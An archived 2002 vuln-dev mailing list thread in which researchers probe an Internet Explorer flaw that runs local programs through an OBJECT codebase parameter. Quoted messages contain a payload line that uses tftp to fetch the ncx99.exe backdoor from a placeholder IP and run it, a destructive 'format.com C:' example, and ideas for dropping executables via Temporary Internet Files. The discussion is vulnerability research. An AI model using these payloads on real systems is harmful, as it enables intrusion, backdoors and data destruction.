Re: Rather large MSIE-hole

["Keegan" <keegan () xor67 org>]

I tried using IE:Download to download a file into Temporary Internet Files,
then use the hole to run it.  Perhaps c:\windows\temporary internet
files\content.ie5\index.dat could be parsed to find where the file was saved
to.  Many <OBJECT>s can be added to the same HTML so that one will be
correct.  However, an attempt to run an EXE from Temporary Internet Files
results in the standard "Your security settings do not allow this" message.
Also BAT files cannot be run from anywhere.

keegan

----- Original Message -----
From: "Ryan Sweat" <h3xm3 () swbell net>
To: "'Slow2Show'" <sl2sho () yahoo com>; <vuln-dev () securityfocus com>
Sent: Thursday, March 14, 2002 10:36 AM
Subject: RE: Rather large MSIE-hole


> The parameter you insert, ie: 'c:/winnt/system32/calc.exe', is
> transformed into an ActiveX control in C:\WINDOWS\Downloaded Program
> Files.  If you view the properties of the control file it creates, you
> will notice that the parameter is listed as the "CodeBase".  In this
> example it would be file://c:\windows\system32\calc.exe.  I don't
> believe it is possible to supply an argument here as it will only accept
> a complete path and filename with no white spaces.
>
> The ideal exploit would be the ability to inject code onto the user's
> computer and have it run without supplying arguments.  Georgi Guninski
> has described methods of accomplishing this, however it involves
> Temporary Internet Files and the path to that directory will change
> depending on which user is logged in.
>
> http://www.guninski.com/parsedat-desc.html
>
> -ryan
>
> -----Original Message-----
> From: Slow2Show [mailto:sl2sho () yahoo com]
> Sent: Thursday, March 14, 2002 3:30 AM
> To: vuln-dev () securityfocus com
> Subject: Re: Rather large MSIE-hole
>
>
> In-Reply-To: <20020313125115.A14918 () castleblack darkflame net>
>
> > I havent tried, since i don't run MS, how about ?
> > var programName=new Array(
> > 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET
> ncx99.exe',
> > 'c:/winnt/system32/ncx99.exe');
>
> I tried you idea nocon...it seems that the codebase
> will not let you pass any parameters...
> so 'C:/WINDOWS/system32/calc.exe' will work
> but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET
> ncx99.exe' will not because of the parameters
>
> I've researched getting this to work by using  unicode
> chars to see if there was something that you could
> put in to bypass this...but alas it wont work.note that
> spaces are allowed in the directory path, but not after
> the program name.
>
> so this would work:
> 'C:/Program Files/intern~1/IEXPLORER.exe'
>
> but these wont:
> 'C:/Program Files/intern~1/IEXPLORER.exe -k'
> 'C:/WINDOWS/system32/format.com C:'
>
> //pseudo code...showing the concept of how I tried
> every Unicode char
> for(i=0;i<65535;i++)
>      $= unicodeCharAt(i)
>      'C:/Program Files/intern~/IEXPLORER.exe$-k'
>
> The only possible attack vector I can see from this is
> if you had prior knowledge to the path of a program
> on a system that you wanted to execute. This is
> slightly dangerous if you are running as admin
> because the telnet server could be started by
> launching
> %SYSTEMROOT%\system32\tlntsess.exe
> But you would still need a valid user/pass to gain
> access.(and you should be slapped if you are web
> browsing as admin)
>
> I'm glad this hole turned out to be relatively benign...
> this would have turned into a really dangerous hole
> and not just an annoying one if parameters could be
> passed.
>
> But don't forget that script kiddies could "boot" you
> by executing logoff.exe/tsshutdn.exe/tsdiscon.exe/
>
> if anybody else finds a way of getting the parameters
> to work....please post to the list.
>
> lata,
>
> -Slow2Show-
> University of Florida
>
> p.s. see ya @ SANS2002...party Florida style!!